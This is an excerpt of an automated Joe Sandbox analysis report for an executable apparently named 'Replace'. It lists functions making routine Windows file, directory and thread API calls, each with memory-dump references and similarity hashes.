                                                                                                                                                                                                              • API String ID: 2744730728-0
                                                                                                                                                                                                              • Opcode ID: 6ffaef975b29e6003ccfd2a0c81653f806ddc91e34cde55e5daf60f3918acdcb
                                                                                                                                                                                                              • Instruction ID: 82b3c966ad746d3019a9d7899e821e41016f48153af0e7d355227a20a5c5cf67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ffaef975b29e6003ccfd2a0c81653f806ddc91e34cde55e5daf60f3918acdcb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76016972521209AFDF15AFA4EC55AAEBBE4EF40324F00409AF901A2250FB70DA40DBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB23A3 Relevance: 4.5, APIs: 3, Instructions: 42COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 870 bb23a3-bb23c9 SetFilePointer 871 bb23cb-bb23d5 GetLastError 870->871 872 bb23ec-bb23fe 870->872 871->872 873 bb23d7-bb23ea call bb2351 SetLastError 871->873 874 bb2400-bb2404 872->874 873->874
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00BB23BE
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00BB23CB
                                                                                                                                                                                                                • Part of subcall function 00BB2351: SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 00BB2365
                                                                                                                                                                                                                • Part of subcall function 00BB2351: GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00BB2372
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?), ref: 00BB23E2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                                                                              • Opcode ID: 54d52ad155303a754468856698bf2ed1d2665ef81f93d9968c171a1582c13f47
                                                                                                                                                                                                              • Instruction ID: 7ccf8615991e268a237233d9564619b493f170fd0719fd18e2176d4075f4b0db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54d52ad155303a754468856698bf2ed1d2665ef81f93d9968c171a1582c13f47
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B801DC36200108EFCB059F68EC94EEFBBF9EF48320B158166F91697350DB718D11AB64
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD0410 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD20CB: GetLastError.KERNEL32(00000072,-00000086,00000001,00BD1B90,00BD27C0,-00000126,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD20D0
                                                                                                                                                                                                                • Part of subcall function 00BD20CB: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD216E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00BD0547,?,?,00BD03B9,00000000), ref: 00BD0441
                                                                                                                                                                                                              • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00BD0547,?,?,00BD03B9,00000000), ref: 00BD0457
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD0460
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1991824761-0
                                                                                                                                                                                                              • Opcode ID: 0ea5eaf86951c73a7cf631829eb7ea6c54234cb5395d78d0be641d9069bd63da
                                                                                                                                                                                                              • Instruction ID: 17422961e8b6452f7e67d28a620f7574768ba27a4f4e1427ab625ce06816d413
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ea5eaf86951c73a7cf631829eb7ea6c54234cb5395d78d0be641d9069bd63da
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F03030511641ABCB312B65980CF5BBBE8EF01360F058A96BA39C33A0FB20D841CA90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC6A5F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,00000000,00000000,?), ref: 00BC6AB6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTime
                                                                                                                                                                                                              • String ID: Unsupported Method
                                                                                                                                                                                                              • API String ID: 1425588814-3491066157
                                                                                                                                                                                                              • Opcode ID: d47bebba22e0a20bdf14dbb0aa3276af15720d997b46299269758e1eed13b0a8
                                                                                                                                                                                                              • Instruction ID: 831557613fef97fd619a914a8f40f155f52c0d4ae85645f363a66572086c4a45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d47bebba22e0a20bdf14dbb0aa3276af15720d997b46299269758e1eed13b0a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 791128312107509FD724DB2AC858FA7B7F5FF84700B0588ADA596A7621D7B2E846CB11
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BC615F Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,0000000A,00000032,Extracting,?,?,?,?,-00000086,000001E4), ref: 00BC62DB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID: Extracting
                                                                                                                                                                                                              • API String ID: 2962429428-356925411
                                                                                                                                                                                                              • Opcode ID: 4200ce684b01d8413af5203f6464ae9de92a1b3f41b9c60c14d6d937d48cb1c5
                                                                                                                                                                                                              • Instruction ID: d63b7f41eab78c4a28a70401344b72f0ccedb20e0c7732237d705dd5e3cd41b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4200ce684b01d8413af5203f6464ae9de92a1b3f41b9c60c14d6d937d48cb1c5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C515970900259DFDB25EFA8C855FEEBBF4AF19304F5440DEE409A7242DBB09A44CB52
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB3685 Relevance: 3.1, APIs: 2, Instructions: 75fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(-0000000E,?,00000000,?,00000000), ref: 00BB36BF
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(-0000000E,?,00000000,?,00000000), ref: 00BB36E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFindNext
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2029273394-0
                                                                                                                                                                                                              • Opcode ID: 2501d0c80630b2d7a23a331f80979134f782546106250a2a79daa65c868c76b0
                                                                                                                                                                                                              • Instruction ID: ea4fbb0072d4fede37d60993010d785a32178e9059916146f8036e12377aca28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2501d0c80630b2d7a23a331f80979134f782546106250a2a79daa65c868c76b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521D1B12082009BDB319B21D895EFBB7E9EF85B10F14469AD45287290EFB1EE06D781
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BBEB3D Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,00BBE9A8,?,?), ref: 00BBEB4B
                                                                                                                                                                                                                • Part of subcall function 00BB456E: GetLastError.KERNEL32(00BB45F3,?,000000A4,00BCB95B,-000000EA,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB456E
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,00BBE9A8,?,?), ref: 00BBEB6F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventReset$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4016784251-0
                                                                                                                                                                                                              • Opcode ID: ca247e5ca24d7ff21a46dfac626672655cbaca3cefd1404ff99e96ee05da33e1
                                                                                                                                                                                                              • Instruction ID: 974bc91cf7c2a16f15151b7c3c43c8df3387ae1159c132a090615a1ad9477470
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca247e5ca24d7ff21a46dfac626672655cbaca3cefd1404ff99e96ee05da33e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9015A30216601AFE730AAB58CD1EFBB7D8EF24354B1444EEE52781572EBE1DC44DA62
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2848 Relevance: 3.0, APIs: 2, Instructions: 41fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB30F3: GetFileAttributesA.KERNEL32(00000000), ref: 00BB310F
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,?,?,-00000086,000001E4), ref: 00BB288A
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,-00000086,000001E4), ref: 00BB28A0
                                                                                                                                                                                                                • Part of subcall function 00BB2575: SetFileAttributesA.KERNEL32(00000000,00000000,?,?,-00000086,000001E4), ref: 00BB2594
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesDelete
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2910425767-0
                                                                                                                                                                                                              • Opcode ID: 4975771c5734a2b2cc66b5fdcb21b2ece228eaa6ebd1ef13a12db53ecf965cc8
                                                                                                                                                                                                              • Instruction ID: f16954750fea064181c08e9a5a8056900f11a326fee2a79580da0d5a3acc635d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4975771c5734a2b2cc66b5fdcb21b2ece228eaa6ebd1ef13a12db53ecf965cc8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBF0C231D10514A7DF3027749C56BFE33C59F56320F1047E6A821A71E5EFE5C8468280
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB227E Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB22EF: FindCloseChangeNotification.KERNELBASE(-0000002A,-0000002A,00BB228C), ref: 00BB22F9
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,00000000,00000000,?,00000000), ref: 00BB22DC
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00BB22B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Create$ApisChangeCloseFindNotification
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2652355470-0
                                                                                                                                                                                                              • Opcode ID: 277f36a49395a9a398a296f49fb52b9d9b5180e16b2a2cf3030d13096b199273
                                                                                                                                                                                                              • Instruction ID: 8356d390d9b5273142d0820975e474fbcf0d775492131bd9c0e8b61d609a757a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 277f36a49395a9a398a296f49fb52b9d9b5180e16b2a2cf3030d13096b199273
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6601FB3640020AFFCF216FA0DC06FDE7FA2EF18314F108596FA51661A1DBB195A5EB94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BD035B Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(00BE47D8,0000000C), ref: 00BD036E
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD0375
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorExitLastThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1611280651-0
                                                                                                                                                                                                              • Opcode ID: e8a8d1e0c0cc1a43f23bc779586ca4fdf21085f1be0b32a375da5a4644525a09
                                                                                                                                                                                                              • Instruction ID: 7a72f75a5452bbde0fe7036a1218b09ae617b4eab63e28326a61f66cdc942ad2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8a8d1e0c0cc1a43f23bc779586ca4fdf21085f1be0b32a375da5a4644525a09
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF08C71910241AFDB04BBB0C81AF6EBBB4EF55310F11418AF4159B362EF30A941CBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB7B3E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00BB7B59
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 00BB7B7F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                                                                                              • Opcode ID: e9f6e79d3ce52b99b1c2d32fcb26d7469ccc14bb5820c612b269d573ffb1549c
                                                                                                                                                                                                              • Instruction ID: b46927aac985a366f0495caf85a3c43bfabd82babd4a2c4595b7b22a71381b44
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9f6e79d3ce52b99b1c2d32fcb26d7469ccc14bb5820c612b269d573ffb1549c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9F09032801116EBCB11ABA0D856FEEBBF1AF04350F4144D9F2017B2A0EF755A44DB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2575 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,?,?,-00000086,000001E4), ref: 00BB25AB
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,?,?,-00000086,000001E4), ref: 00BB2594
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Attributes$Apis
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2164219574-0
                                                                                                                                                                                                              • Opcode ID: 8b9124f28afc0801163203b124652f4aab3eb19c0ba868bfc750cbdeb617fb00
                                                                                                                                                                                                              • Instruction ID: 7ca6c59fc5714bf6333d64abdf3fe099f1a8075d079fe06f9346b62eb9ac1f56
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b9124f28afc0801163203b124652f4aab3eb19c0ba868bfc750cbdeb617fb00
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E09239D05121A7CF352B75AD2AEEF7BE8DF22710B1042E6EC1267261EFA0C905D6D1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB2603 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00BB263A
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 00BB2621
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectory$ApisFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2873393970-0
                                                                                                                                                                                                              • Opcode ID: beed321fa8d808596a17e2ce7b9cb29c5d8044aa2e79dce5aae3a83db6de0b2c
                                                                                                                                                                                                              • Instruction ID: 40b36d01f14ea0443932bff76ca73c215e571309fccb79fca4615c5e66a7f57c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: beed321fa8d808596a17e2ce7b9cb29c5d8044aa2e79dce5aae3a83db6de0b2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66E09235A00255ABCF212B74AC26FEE77E49B01744F5446D9E912BB1E0DFB4D805D780
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00BB25BE Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,-00000086,000001E4), ref: 00BB25F1
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(00000000,?,?,-00000086,000001E4), ref: 00BB25DA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
